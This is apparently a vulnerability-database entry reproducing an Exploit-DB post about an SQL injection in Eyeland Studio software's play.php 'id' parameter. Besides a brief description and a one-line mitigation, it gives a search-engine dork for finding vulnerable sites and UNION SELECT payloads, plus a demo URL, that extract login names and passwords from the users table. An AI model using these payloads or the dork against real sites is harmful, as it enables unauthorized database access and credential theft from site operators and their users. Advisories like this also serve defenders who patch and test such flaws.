Eyeland Studio Inc. SQL Injection Vulnerability

vendor:

N/A

by:

Mr.P3rfekT

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Lunix

N/A

Eyeland Studio Inc. SQL Injection Vulnerability

A SQL injection vulnerability exists in Eyeland Studio Inc. software. An attacker can send a malicious SQL query to the vulnerable parameter 'id' in the 'play.php' script to execute arbitrary SQL commands on the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

Title: Eyeland Studio Inc. SQL Injection Vulnerability
# Version: 2.0
# Author: Mr.P3rfekT
# Software Site:http://www.eyeland.com/
# Tested on Lunix
# CVE : N/A
# Home :www.realmadridsy.com & www.v4-team.com/cc
############### Founded By Mr.P3rfekT ##############


# Dork :"Eyeland Studio Inc. All Rights Reserved."

# Helllo Allz.



# Exploit :

http://[site]/path/play.php?id={SQLi}



#Poc :
union select 1,2,3,login,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users


# Poc:

union select 1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users


# Demo:
http:www.site.com/path/play.php?id=-25union select 1,2,3,login,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users


./done.


Mail : R4p@hotmail.com

Greeeeeeeeeeeeeetz : Cyb3r-DeViL , V4-team.com/cc Members Except Some Lammerz Cheaters They Know Them Self Muhahaha